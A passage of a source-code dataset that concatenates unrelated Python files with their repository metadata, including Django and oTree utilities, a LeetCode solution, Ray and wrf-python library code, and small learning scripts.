self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
|
[
"vb@container-registry.com"
] |
vb@container-registry.com
|
80acd454dc42c8718c69d967d6cb1d86e6ac4d21
|
a9e81c87022fdde86d47a4ec1e74791da8aa0e30
|
/tensorflow-learning/base/loss-function/03-sigmoid.py
|
0f8dabd13b8e2db95a38496a8efb6bcc08f2cfd1
|
[
"Apache-2.0"
] |
permissive
|
ymli1997/deeplearning-notes
|
c5c6926431b7efc1c6823d85e3eb470f3c986494
|
f2317d80cd998305814f988e5000241797205b63
|
refs/heads/master
| 2020-07-29T11:15:43.689307
| 2018-05-05T10:58:18
| 2018-05-05T10:58:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
py
|
# -*- coding:utf-8 -*-
import numpy as np
import tensorflow as tf
a = tf.constant([[1.0,2.0],[1.0,2.0],[1.0,2.0]])
res = tf.nn.sigmoid(a)
init_opt = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init_opt)
result = sess.run(res)
print(result)
|
[
"kkoolerter@gmail.com"
] |
kkoolerter@gmail.com
|
3fbe1bceff869e837fbf8bc1c9ada9178969a38c
|
e7d791d3f24076cad781b963ed4375cace3ba734
|
/examples/dataloader_test.py
|
fac7ec386d4585dafd320a52387fd369c2cf7a49
|
[
"Apache-2.0"
] |
permissive
|
jiniaoxu/bi-lstm-crf
|
d9512cc524f8a5d60509391d3eb0e931d299b230
|
0667537207b8cb43b68fe5ab4378f770d05bf45a
|
refs/heads/master
| 2020-04-13T18:06:51.797880
| 2018-12-24T08:12:44
| 2018-12-24T08:12:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
py
|
from dltokenizer.data_loader import DataLoader
if __name__ == '__main__':
data_loader = DataLoader("../data/src_dict.json", "../data/tgt_dict.json", batch_size=64)
generator = data_loader.generator("../data/2014")
for _ in range(1):
sent, chunk = next(generator)
assert len(sent) == len(chunk)
print(sent.shape)
print(chunk.shape)
|
[
"1490215053@qq.com"
] |
1490215053@qq.com
|
02701604a58c249a1488f5470f94671ab4bf44ad
|
15b801de0dd019411135aad75f7cd653061489d3
|
/actions/migrations/0001_initial.py
|
d0c21952f659882959d85157b7158114b4c98957
|
[] |
no_license
|
007vict/bookmarksbyexample
|
ff73befa059de10cd4b425b615678ac0fd1fa528
|
6b614affe46ebc2ac0687ed5cdf50c6439784932
|
refs/heads/master
| 2020-04-29T16:59:37.434190
| 2019-03-22T21:29:27
| 2019-03-22T21:29:27
| 176,282,231
| 0
| 0
| null | 2019-03-18T19:15:24
| 2019-03-18T12:38:50
|
Python
|
UTF-8
|
Python
| false
| false
| 1,262
|
py
|
# Generated by Django 2.2rc1 on 2019-03-22 15:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Actions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('verb', models.CharField(max_length=255)),
('target_id', models.PositiveIntegerField(blank=True, db_index=True, null=True)),
('created', models.DateTimeField(auto_now_add=True, db_index=True)),
('target_ct', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='target_obj', to='contenttypes.ContentType')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='actions', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-created',),
},
),
]
|
[
"super_vg@bk.ru"
] |
super_vg@bk.ru
|
e0bb05f7819d66e7ae57c40d5566afcc54aeedac
|
e4920c4fe4290bde524e0c141189f80fddfe44b7
|
/dashboard/urls.py
|
524c5746de8285b0cc666f48b3c5563297731e11
|
[] |
no_license
|
ShahadatShuvo/Django_portfolio
|
42af2b0aa686bff08730cdb105f95d6b63adb620
|
795ed7cbb6444245af08582ea63f57a0f32679a0
|
refs/heads/master
| 2023-05-30T01:43:50.409584
| 2021-06-14T08:29:18
| 2021-06-14T08:29:18
| 376,372,632
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 925
|
py
|
from django.urls import path
from django.contrib.auth.views import LogoutView
from .views import (
dashboard,
profile,
profile_edit,
messages,
messages_api,
projects,
projects_api,
LoginView,
EducationView,
)
app_name = 'dashboard'
urlpatterns = [
path('', dashboard, name='dashboard'),
path('profile/', profile, name='profile'),
path('profile/edit/', profile_edit, name='profile_edit'),
path('messages', messages, name='messages'),
path('messages/api/', messages_api, name='messages_api'),
path('projects', projects, name='projects'),
path('projects/api/', projects_api, name='projects_api'),
path('education/', EducationView.as_view(), name='education'),
# path('education/', EducationView.as_view(), name='one_education'),
path('login/', LoginView.as_view(), name='login'),
path('logout/', LogoutView.as_view(), name='logout'),
]
|
[
"shahadat@baiust.edu.bd"
] |
shahadat@baiust.edu.bd
|
b8aa7c0fbbbc85ced858cb68b0a50f1132f1d81e
|
f6fee9397e858bce2d2e4258602d4a029b9a859e
|
/LinkedList/Leetcode 2. Add Two Numbers.py
|
1e00848552ec84c31c195e4f04828dcbc7479c86
|
[
"MIT"
] |
permissive
|
sriharsha004/LeetCode
|
e180dc4c0e1af217d3fbe026650b4035c50a388b
|
95ca845e40c7c9f8ba589a45332791d5bbf49bbf
|
refs/heads/master
| 2022-12-07T11:37:28.843751
| 2020-08-21T03:05:45
| 2020-08-21T03:05:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 572
|
py
|
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
dummy = ListNode(0)
cur = dummy
carry = 0
while l1 or l2:
sums = 0
if l1:
sums += l1.val
l1 = l1.next
if l2:
sums += l2.val
l2 = l2.next
sums += carry
cur.next = ListNode(sums%10)
cur = cur.next
carry = sums//10
if carry:
cur.next = ListNode(carry)
return dummy.next
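# Note: ListNode is provided by the LeetCode judge. To run this solution locally, a
# minimal stand-in (an assumption, not part of the original submission) would be:
#
# class ListNode:
#     def __init__(self, val=0, next=None):
#         self.val = val
#         self.next = next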
|
[
"Tian.Zeng@aexp.com"
] |
Tian.Zeng@aexp.com
|
f57f7a2a1489715fa67b8cc3ca5912999c0b2b63
|
0f41b3564b08045f56b8ee4743ef8834b88a274e
|
/otree/management/commands/resetdb.py
|
b7de7fb73d101b0efdeaccd536b8a8f86fc9d5d5
|
[
"MIT"
] |
permissive
|
bjgoode/otree-core
|
b04911f00671ef6bbfeeb184359133f85ec221cb
|
ab6bbcbdb53cb1d74b205f04f16eb40ea099a45d
|
refs/heads/master
| 2021-05-11T18:31:00.398740
| 2018-01-17T23:28:22
| 2018-01-17T23:28:22
| 117,827,105
| 1
| 0
| null | 2018-01-17T11:27:21
| 2018-01-17T11:27:21
| null |
UTF-8
|
Python
| false
| false
| 6,623
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# IMPORTS
# =============================================================================
import logging
from django.conf import settings
from django.core.management.base import BaseCommand
from django.core.management import call_command
from django.db import connections, transaction
from django.db.migrations.loader import MigrationLoader
from django.db.migrations.autodetector import MigrationAutodetector
import six
from unittest import mock
# =============================================================================
# LOGGER
# =============================================================================
logger = logging.getLogger('otree')
def drop_tables_command(db_engine):
if 'sqlite3' in db_engine:
return 'DROP TABLE {table};'
if 'oracle' in db_engine:
return 'DROP TABLE "{table}" CASCADE CONSTRAINTS;'
if 'postgres' in db_engine:
return 'DROP TABLE "{table}" CASCADE;'
if 'mysql' in db_engine:
return (
'SET FOREIGN_KEY_CHECKS = 0;'
'DROP TABLE {table} CASCADE;'
'SET FOREIGN_KEY_CHECKS = 1;')
raise ValueError(
'resetdb command does not recognize DB engine "{}"'.format(db_engine))
class Command(BaseCommand):
help = (
"Resets your development database to a fresh state. "
"All data will be deleted.")
def add_arguments(self, parser):
ahelp = (
'Tells the resetdb command to NOT prompt the user for '
'input of any kind.')
parser.add_argument(
'--noinput', action='store_false', dest='interactive',
default=True, help=ahelp)
def _confirm(self):
self.stdout.write(
"This will delete and recreate your database. ")
answer = six.moves.input("Proceed? (y or n): ")
if answer:
return answer[0].lower() == 'y'
return False
def _drop_table_stmt(self, dbconf):
engine = dbconf["ENGINE"]
return drop_tables_command(engine)
def _get_tables(self, db):
tables = []
out = six.StringIO()
call_command('inspectdb', database=db, no_color=True, stdout=out)
for line in out.getvalue().splitlines():
line = line.strip()
if line.startswith("db_table = '"):
tablename = line.replace(
"db_table = '", "", 1).replace("'", "").strip()
tables.append(tablename)
return tuple(reversed(tables))
def _drop_tables(self, tables, db, dt_stmt):
with connections[db].cursor() as cursor:
for table in tables:
stmt = dt_stmt.format(table=table)
cursor.execute(stmt)
def handle(self, **options):
if options.pop("interactive") and not self._confirm():
self.stdout.write('Canceled.')
return
for db, dbconf in six.iteritems(settings.DATABASES):
db_engine = dbconf['ENGINE']
if 'postgresql' in db_engine.lower():
db_engine = 'PostgreSQL'
elif 'sqlite' in db_engine.lower():
db_engine = 'SQLite'
elif 'mysql' in db_engine.lower():
db_engine = 'MySQL'
logger.info("Database engine: {}".format(db_engine))
dt_stmt = self._drop_table_stmt(dbconf)
logger.info("Retrieving Existing Tables...")
tables = self._get_tables(db)
logger.info("Dropping Tables...")
# use a transaction to prevent the DB from getting in an erroneous
# state, which can result in a different error message when resetdb
# is run again, making the original error hard to trace.
with transaction.atomic(
using=connections[db].alias,
savepoint=connections[db].features.can_rollback_ddl
):
self._drop_tables(tables, db, dt_stmt)
logger.info("Creating Database '{}'...".format(db))
self.syncdb(db, options)
# second call to 'migrate', simply to
# fake migrations so that runserver doesn't complain
# about unapplied migrations
# note: In 1.9, will need to pass --run-syncdb flag
call_command(
'migrate', database=db, fake=True,
interactive=False, **options)
# mention the word 'columns' here, so people make the connection
# between columns and resetdb, so that when they get a 'no such column'
# error, they know how to fix it.
# (An alternative is to generically catch "no such column" errors,
# but I recall that this was difficult - because there were many
# code paths or exception classes. Could re-investigate.)
logger.info('Created new tables and columns.')
@mock.patch.object(
MigrationLoader, 'migrations_module',
return_value='migrations nonexistent hack')
@mock.patch.object(
MigrationAutodetector, 'changes', return_value=False)
def syncdb(self, db, options, *mocked_args):
'''
patch .migrations_module() to return a nonexistent module,
instead of app_name.migrations.
because this module is not found,
migration system will assume the app has no migrations,
and run syncdb instead.
Hack so that migrate can't find migrations files
this way, syncdb will be run instead of migrate.
This is preferable because
users who are used to running "otree resetdb"
may not know how to run 'otree makemigrations'.
This means their migration files will not be up to date,
ergo migrate will create tables with an outdated schema.
after the majority of oTree users have this new version
of resetdb, we can add a migrations/ folder to each app
in the sample games and the app template,
and deprecate resetdb
and instead use "otree makemigrations" and "otree migrate".
also, syncdb is faster than migrate, and there is no
advantage to migrate since it's being run on a newly
created DB anyway.
also patch MigrationAutodetector.changes() to suppress the warning
"Your models have changes that are not yet reflected in a migration..."
'''
call_command(
'migrate', database=db,
interactive=False, **options)
|
[
"chris@otree.org"
] |
chris@otree.org
|
8aa639aff98132e95e43aa967b1655b5351b5783
|
880d9cc2704f7de649ad4455dd7ec2806b6a9e95
|
/PythonExam/北京理工大学Python语言程序设计-Book/Chapter6/e10.3CalThreeKingdoms.py
|
7dfc8f674c32c92b48171bf8ba1a75ce241cab31
|
[] |
no_license
|
shunz/Python-100-Days_Practice
|
14795757effcff50a4644f57c5c109fa1c9c38ac
|
82f508ff6911ce3aa5c5a69cd481a6cc87f02258
|
refs/heads/master
| 2020-12-26T18:52:32.755384
| 2020-04-07T15:49:36
| 2020-04-07T15:49:36
| 237,604,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,784
|
py
|
"""《三国演义》人物出场统计
- Input
- Find the full text of the novel online and save it as threekingdoms.txt
- Processing
1. Split the Chinese text into words
- Segment the text with jieba
- Exclude words that are not character names, using a set as an exclusion vocabulary
- Merge different names of the same person, e.g. 刘备 = 刘玄德 = 玄德 = 刘皇叔 = 主公
2. Count each word
- Store each word in the variable word
- Use a dictionary counts = {}
- counts[word] = counts.get(word, 0) + 1  # a new word enters the dict with count 1; an existing word's count is incremented
3. Sort the counts from high to low
- Dictionaries are unordered, so convert to a list and sort with sort() plus a lambda keyed on each word's occurrence count
- Output
- Print the top 10 high-frequency words in a formatted layout
"""
import jieba
excludes = {'却说','将军','二人','不可','荆州','不能','商议','如此','如何','军士','左右','军马','引兵','次日',\
'大喜','天下','东吴','于是'}
txt = open('threekingdoms.txt', 'r').read().lower()
words = jieba.lcut(txt)
counts = {}
for w in words:
if w not in excludes and len(w) != 1:
if w in ['诸葛亮', '孔明曰']:
w = '孔明'
elif w in ['关公', '云长']:
w = '关羽'
elif w in ['玄德', '玄德曰']:
w = '刘备'
elif w in ['孟德', '丞相']:
w = '曹操'
counts[w] = counts.get(w, 0) + 1
items = list(counts.items())
items.sort(key=lambda x: x[1], reverse=True)
for i in range(10):  # top 10, as described in the module docstring
word, count = items[i]
print(f'{word:<10}{count:>5}')
|
[
"rockucn@gmail.com"
] |
rockucn@gmail.com
|
11f87053a9b778f57300d4430253f97fcf77ccc6
|
3a533d1503f9a1c767ecd3a29885add49fff4f18
|
/saleor/graphql/translations/mutations/product_translate.py
|
bfb252870e111b3c02e367b5f1d589c8e89a8ce5
|
[
"BSD-3-Clause"
] |
permissive
|
jonserna/saleor
|
0c1e4297e10e0a0ce530b5296f6b4488f524c145
|
b7d1b320e096d99567d3fa7bc4780862809d19ac
|
refs/heads/master
| 2023-06-25T17:25:17.459739
| 2023-06-19T14:05:41
| 2023-06-19T14:05:41
| 186,167,599
| 0
| 0
|
BSD-3-Clause
| 2019-12-29T15:46:40
| 2019-05-11T18:21:31
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 2,059
|
py
|
import graphene
from ....core.tracing import traced_atomic_transaction
from ....permission.enums import SitePermissions
from ....product import models as product_models
from ...channel import ChannelContext
from ...core import ResolveInfo
from ...core.enums import LanguageCodeEnum
from ...core.types import TranslationError
from ...plugins.dataloaders import get_plugin_manager_promise
from ...product.types import Product
from .utils import BaseTranslateMutation, TranslationInput
class ProductTranslate(BaseTranslateMutation):
class Arguments:
id = graphene.ID(
required=True,
description="Product ID or ProductTranslatableContent ID.",
)
language_code = graphene.Argument(
LanguageCodeEnum, required=True, description="Translation language code."
)
input = TranslationInput(required=True)
class Meta:
description = "Creates/updates translations for a product."
model = product_models.Product
object_type = Product
error_type_class = TranslationError
error_type_field = "translation_errors"
permissions = (SitePermissions.MANAGE_TRANSLATIONS,)
@classmethod
def perform_mutation( # type: ignore[override]
cls, _root, info: ResolveInfo, /, *, id, input, language_code
):
node_id = cls.clean_node_id(id)[0]
instance = cls.get_node_or_error(info, node_id, only_type=Product)
cls.validate_input(input)
manager = get_plugin_manager_promise(info.context).get()
with traced_atomic_transaction():
translation, created = instance.translations.update_or_create(
language_code=language_code, defaults=input
)
product = ChannelContext(node=instance, channel_slug=None)
if created:
cls.call_event(manager.translation_created, translation)
else:
cls.call_event(manager.translation_updated, translation)
return cls(**{cls._meta.return_field_name: product})
|
[
"noreply@github.com"
] |
jonserna.noreply@github.com
|
f792e5de0ef32f047b98b4a3d27b410d7185e5ad
|
d69bff5c124177d16074034da7b87859a4e9a525
|
/src/pretix/plugins/statistics/__init__.py
|
eb7d476351730b84ea392eb9ec1ac39e48ad3ec5
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
snadal/pretix
|
f377313d52cb57d0193c8d102af1e47f64de7ce6
|
430ccece9a3af6fd93c51626a9551ef79cee8002
|
refs/heads/master
| 2021-02-15T09:17:07.063355
| 2020-03-04T11:44:37
| 2020-03-04T11:44:37
| 244,885,007
| 0
| 0
|
NOASSERTION
| 2020-03-04T11:38:09
| 2020-03-04T11:38:09
| null |
UTF-8
|
Python
| false
| false
| 588
|
py
|
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
from pretix import __version__ as version
class StatisticsApp(AppConfig):
name = 'pretix.plugins.statistics'
verbose_name = _("Statistics")
class PretixPluginMeta:
name = _("Statistics")
author = _("the pretix team")
version = version
category = 'FEATURE'
description = _("This plugin shows you various statistics.")
def ready(self):
from . import signals # NOQA
default_app_config = 'pretix.plugins.statistics.StatisticsApp'
|
[
"mail@raphaelmichel.de"
] |
mail@raphaelmichel.de
|
f16a8c1bae7847be6dfceb67897dee835eca9958
|
907b3bbd44c95be1542a36feaadb6a71b724579f
|
/files/home/gcloud/google-cloud-sdk/lib/surface/container/builds/create.py
|
c0d1af759913e065a72a78222c6ad59bf6ef3554
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
vo0doO/com.termux
|
2d8f536c1a5dbd7a091be0baf181e51f235fb941
|
c97dd7b906e5ef3ec157581fd0bcadd3e3fc220e
|
refs/heads/master
| 2020-12-24T09:40:30.612130
| 2016-11-21T07:47:25
| 2016-11-21T07:47:25
| 73,282,539
| 2
| 2
| null | 2020-07-24T21:33:03
| 2016-11-09T12:33:01
|
Python
|
UTF-8
|
Python
| false
| false
| 919
|
py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Create build command."""
from googlecloudsdk.calliope import base
# Importing the beta version of this command to reduce repetition.
from surface.container.builds import submit
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class Create(submit.Submit):
"""Create a build using the Google Container Builder service."""
|
[
"kirsanov.bvt@gmail.com"
] |
kirsanov.bvt@gmail.com
|
eacc4ec788812a02d38d19d23aea55d3f053a2dc
|
b3699724907850fd26cbce4509fec83a33b89760
|
/python/ray/autoscaler/_private/event_summarizer.py
|
d877bf424459d75777a728931f35e79993c01ecb
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
BonsaiAI/ray
|
5e2f26a81d865a795261d11f9182aca7f07c7b97
|
941d30f082fe879ea30618af14327c25b5a21a74
|
refs/heads/master
| 2023-06-12T05:15:29.370188
| 2021-05-06T07:03:53
| 2021-05-06T07:03:53
| 233,708,687
| 3
| 5
|
Apache-2.0
| 2023-05-27T08:06:37
| 2020-01-13T22:41:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,430
|
py
|
from typing import Any, Callable, Dict, List
class EventSummarizer:
"""Utility that aggregates related log messages to reduce log spam."""
def __init__(self):
self.events_by_key: Dict[str, int] = {}
def add(self, template: str, *, quantity: Any,
aggregate: Callable[[Any, Any], Any]) -> None:
"""Add a log message, which will be combined by template.
Args:
template (str): Format string with one placeholder for quantity.
quantity (Any): Quantity to aggregate.
aggregate (func): Aggregation function used to combine the
quantities. The result is inserted into the template to
produce the final log message.
"""
# Enforce proper sentence structure.
if not template.endswith("."):
template += "."
if template in self.events_by_key:
self.events_by_key[template] = aggregate(
self.events_by_key[template], quantity)
else:
self.events_by_key[template] = quantity
def summary(self) -> List[str]:
"""Generate the aggregated log summary of all added events."""
out = []
for template, quantity in self.events_by_key.items():
out.append(template.format(quantity))
return out
def clear(self) -> None:
"""Clear the events added."""
self.events_by_key.clear()
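# A minimal usage sketch (hypothetical values, not taken from the autoscaler itself):
if __name__ == "__main__":
    summarizer = EventSummarizer()
    summarizer.add("Resized to {} CPUs", quantity=4, aggregate=max)
    summarizer.add("Resized to {} CPUs", quantity=8, aggregate=max)
    # Both events share one template, so they collapse into a single summary line.
    print(summarizer.summary())  # ['Resized to 8 CPUs.']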
|
[
"noreply@github.com"
] |
BonsaiAI.noreply@github.com
|
0d1c07214d02cff04c05d3e2658206175b689f11
|
166e2e2095ca86e44735d3dd85b54d3f30e03baf
|
/app/__init__.py
|
f8617206c3f0409fdb445c1498a0a463afbb73f6
|
[
"MIT"
] |
permissive
|
joss13aws/damgteam
|
e04502e7c89142a9e060a2d879cfcb9cf0d2e29a
|
ce5beedc5b187141bcec76c15011fe8c4ae33743
|
refs/heads/master
| 2022-01-25T08:22:44.387636
| 2018-09-12T07:15:39
| 2018-09-12T07:15:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 896
|
py
|
# -*- coding: utf-8 -*-
"""
Script Name: __init__.py.py
Author: Do Trinh/Jimmy - 3D artist.
Description:
"""
# -------------------------------------------------------------------------------------------------------------
from __future__ import absolute_import
import os, subprocess
BASE = os.path.dirname(__file__).split(__name__)[0]
if __name__ == '__main__':
ROOT = BASE.split('app')[0]
else:
ROOT = (os.path.dirname(__file__).split(__name__)[0])
try:
os.environ['ROOT']  # raises KeyError if ROOT has not been set yet
except KeyError:
subprocess.Popen('SetX {} %CD%'.format('ROOT'), shell=True).wait()
else:
if os.getenv('ROOT') != ROOT:
subprocess.Popen('SetX {} %CD%'.format('ROOT'), shell=True).wait()
# -------------------------------------------------------------------------------------------------------------
# Created by panda on 24/08/2018 - 1:28 AM
# © 2017 - 2018 DAMGteam. All rights reserved
|
[
"dot@damgteam.com"
] |
dot@damgteam.com
|
fa4720480d99598478d88893f74730d1b74f153b
|
bfd6ac084fcc08040b94d310e6a91d5d804141de
|
/PulseSequences2/SidebandOptimization.py
|
5b3223a3788320f39d1161c1d19f3a5584fa78af
|
[] |
no_license
|
jqwang17/HaeffnerLabLattice
|
3b1cba747b8b62cada4467a4ea041119a7a68bfa
|
03d5bedf64cf63efac457f90b189daada47ff535
|
refs/heads/master
| 2020-12-07T20:23:32.251900
| 2019-11-11T19:26:41
| 2019-11-11T19:26:41
| 232,792,450
| 1
| 0
| null | 2020-01-09T11:23:28
| 2020-01-09T11:23:27
| null |
UTF-8
|
Python
| false
| false
| 2,590
|
py
|
from common.devel.bum.sequences.pulse_sequence import pulse_sequence
from labrad.units import WithUnit as U
from treedict import TreeDict
class SidebandOptimization(pulse_sequence):
scannable_params = {'SidebandCooling.sideband_cooling_amplitude_854' : [(-30., -6., 3., 'dBm'), 'current'],
'SidebandCooling.stark_shift' : [(-50.0, 50.0, 2.5, 'kHz'), 'current']}
show_params= [
'SidebandCooling.line_selection',
'SidebandCooling.sideband_cooling_amplitude_729',
'SidebandCooling.sideband_cooling_amplitude_854',
'SidebandCooling.sideband_cooling_amplitude_866',
'SidebandCooling.selection_sideband',
'SidebandCooling.order',
'SidebandCooling.stark_shift',
'SidebandCooling.cooling_cycles',
'RabiFlopping.rabi_amplitude_729',
'RabiFlopping.duration',
'RabiFlopping.line_selection',
'RabiFlopping.selection_sideband',
'RabiFlopping.order',
]
def sequence(self):
from StatePreparation import StatePreparation
from subsequences.RabiExcitation import RabiExcitation
from subsequences.StateReadout import StateReadout
from subsequences.TurnOffAll import TurnOffAll
## calculate the scan params
rf = self.parameters.RabiFlopping
freq_729=self.calc_freq(rf.line_selection , rf.selection_sideband , rf.order)
self.end = U(10., 'us')
self.addSequence(TurnOffAll)
self.addSequence(StatePreparation)
self.addSequence(RabiExcitation,{'Excitation_729.rabi_excitation_frequency': freq_729,
'Excitation_729.rabi_excitation_amplitude': rf.rabi_amplitude_729,
'Excitation_729.rabi_excitation_duration': rf.duration })
self.addSequence(StateReadout)
@classmethod
def run_initial(cls,cxn, parameters_dict):
print "Switching the 866DP to auto mode"
cxn.pulser.switch_auto('866DP')
@classmethod
def run_in_loop(cls,cxn, parameters_dict, data, x):
#print "Running in loop Rabi_floping"
pass
@classmethod
def run_finally(cls,cxn, parameters_dict, data, x):
print "switching the 866 back to ON"
cxn.pulser.switch_manual('866DP', True)
|
[
"haeffnerlab@gmail.com"
] |
haeffnerlab@gmail.com
|
abc5778f8d9954d10c526765fe14fd1b7d08ab46
|
33789ec4b4a2d35f06cd89068f90686650057102
|
/object_oriented_programming/polymorphism/function_overloading.py
|
2b41cb5df64489594b40d2cdb5f9750b69d6a1df
|
[] |
no_license
|
unnievarghese/originalpythonluminar
|
d9c342a5b34b7236bf34f8a53b35188b12e90b3d
|
616929ff471700248b0619c35025562c131ea459
|
refs/heads/master
| 2023-03-01T20:59:41.165467
| 2021-01-23T11:26:09
| 2021-01-23T11:26:09
| 315,814,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 606
|
py
|
def add():
print('inside no arg add method')
def add(num):
print('inside 1 arg add method')
def add(num1,num2):
print('inside 2 arg add method')
# a def outside a class is a plain function
# this mimics function overloading, but Python keeps only the most recent definition
# of a name, so the earlier add() versions with fewer parameters are replaced
print(add(1,2)) # works: the surviving add() takes exactly two arguments
print(add(1)) # fails with TypeError: the one-argument version was overwritten, not kept
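# --- editor's sketch, not part of the original exercise ---
# Kept as comments because the failing call above raises TypeError and stops the script.
# It would show that only the last definition of add survives (standard-library inspect):
#   import inspect
#   print(inspect.signature(add))   # -> (num1, num2); the 0- and 1-argument versions are gone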
|
[
"unnieputhengadi9@gmail.com"
] |
unnieputhengadi9@gmail.com
|
be86e46364d706fb41a1344fe6cdb49253da255f
|
3f345ac4cad6dc931260ab40c40d0977ba51db77
|
/src/__init__.py
|
24b34714951bc77838edb3c7468a1acd0abc9a0b
|
[] |
no_license
|
fran-jo/EngineME
|
f586831f55942320a0dc07dbf70a409c2fc475d5
|
69555183d5b8a3bc3c4a0c406da2a58b2f9fcb70
|
refs/heads/master
| 2020-03-23T21:03:39.305112
| 2019-02-09T22:03:09
| 2019-02-09T22:03:09
| 142,078,920
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 179
|
py
|
from eme.logiclayer.engine import enginedym
from eme.logiclayer.engine import engineomc
from eme.logiclayer.command import CommandOMC
# from engine.engineJModelica import EngineJM
|
[
"fran_jo@hotmail.com"
] |
fran_jo@hotmail.com
|
96e4c704ecf4e1e33f84c8abce3e5307dfcb01bc
|
33294c238bd5c6ad0cb69d7b6d6922a54b1f7d95
|
/src/wrf/g_omega.py
|
f2f70ba8836d6204a9722f15fdb14897dc289f60
|
[
"Apache-2.0"
] |
permissive
|
NCAR/wrf-python
|
a3b81aa0de3c7dd8b20d390bd949e3f4e3100bed
|
79dda8329dd814aaba44cddf62cd12db0f5e2e97
|
refs/heads/develop
| 2023-06-30T03:14:14.380762
| 2023-06-16T22:26:09
| 2023-06-16T22:26:09
| 59,517,733
| 384
| 155
|
Apache-2.0
| 2023-06-23T19:43:18
| 2016-05-23T20:55:40
|
Python
|
UTF-8
|
Python
| false
| false
| 3,272
|
py
|
from __future__ import (absolute_import, division, print_function)
from .constants import Constants
from .destag import destagger
from .extension import _omega, _tk
from .util import extract_vars
from .metadecorators import copy_and_set_metadata
@copy_and_set_metadata(copy_varname="T", name="omega",
description="omega",
units="Pa s-1")
def get_omega(wrfin, timeidx=0, method="cat", squeeze=True, cache=None,
meta=True, _key=None):
"""Return Omega.
    This function extracts the necessary variables from the NetCDF file
object in order to perform the calculation.
Args:
wrfin (:class:`netCDF4.Dataset`, :class:`Nio.NioFile`, or an \
iterable): WRF-ARW NetCDF
data as a :class:`netCDF4.Dataset`, :class:`Nio.NioFile`
or an iterable sequence of the aforementioned types.
timeidx (:obj:`int` or :data:`wrf.ALL_TIMES`, optional): The
desired time index. This value can be a positive integer,
negative integer, or
:data:`wrf.ALL_TIMES` (an alias for None) to return
all times in the file or sequence. The default is 0.
method (:obj:`str`, optional): The aggregation method to use for
sequences. Must be either 'cat' or 'join'.
'cat' combines the data along the Time dimension.
'join' creates a new dimension for the file index.
The default is 'cat'.
squeeze (:obj:`bool`, optional): Set to False to prevent dimensions
with a size of 1 from being automatically removed from the shape
of the output. Default is True.
cache (:obj:`dict`, optional): A dictionary of (varname, ndarray)
that can be used to supply pre-extracted NetCDF variables to the
computational routines. It is primarily used for internal
purposes, but can also be used to improve performance by
eliminating the need to repeatedly extract the same variables
used in multiple diagnostics calculations, particularly when using
large sequences of files.
Default is None.
meta (:obj:`bool`, optional): Set to False to disable metadata and
return :class:`numpy.ndarray` instead of
:class:`xarray.DataArray`. Default is True.
_key (:obj:`int`, optional): A caching key. This is used for internal
purposes only. Default is None.
Returns:
:class:`xarray.DataArray` or :class:`numpy.ndarray`: Omega.
If xarray is
enabled and the *meta* parameter is True, then the result will be a
:class:`xarray.DataArray` object. Otherwise, the result will be a
:class:`numpy.ndarray` object with no metadata.
"""
varnames = ("T", "P", "W", "PB", "QVAPOR")
ncvars = extract_vars(wrfin, timeidx, varnames, method, squeeze, cache,
meta=False, _key=_key)
t = ncvars["T"]
p = ncvars["P"]
w = ncvars["W"]
pb = ncvars["PB"]
qv = ncvars["QVAPOR"]
wa = destagger(w, -3)
full_t = t + Constants.T_BASE
full_p = p + pb
tk = _tk(full_p, full_t)
omega = _omega(qv, tk, wa, full_p)
return omega
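# --- editor's usage sketch, not part of wrf-python itself ---
# The file name below is hypothetical; any WRF-ARW output file should work. In normal use
# this diagnostic is reached through wrf.getvar with the "omega" product name:
#
#   from netCDF4 import Dataset
#   from wrf import getvar
#   wrfin = Dataset("wrfout_d01_2016-10-07_00_00_00")   # hypothetical path
#   omega = getvar(wrfin, "omega", timeidx=0)            # xarray.DataArray in Pa s-1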
|
[
"ladwig@ucar.edu"
] |
ladwig@ucar.edu
|
8f7769ef093d5beca0d0d32a1807271d4d0060da
|
761dbc29537f2271d7cac5ee55bf818cf3d94ee3
|
/solver_methods.py
|
6b2949e8036f047c4f0b16af10481ba7603d3b16
|
[] |
no_license
|
k-off/Rubik_brute_force
|
ee5d78d22ff72ecd312129787571635cd1f6d3fe
|
8688a9e66f8b2d40afe46a449a2b830c5b461e6e
|
refs/heads/master
| 2022-03-07T10:43:56.580884
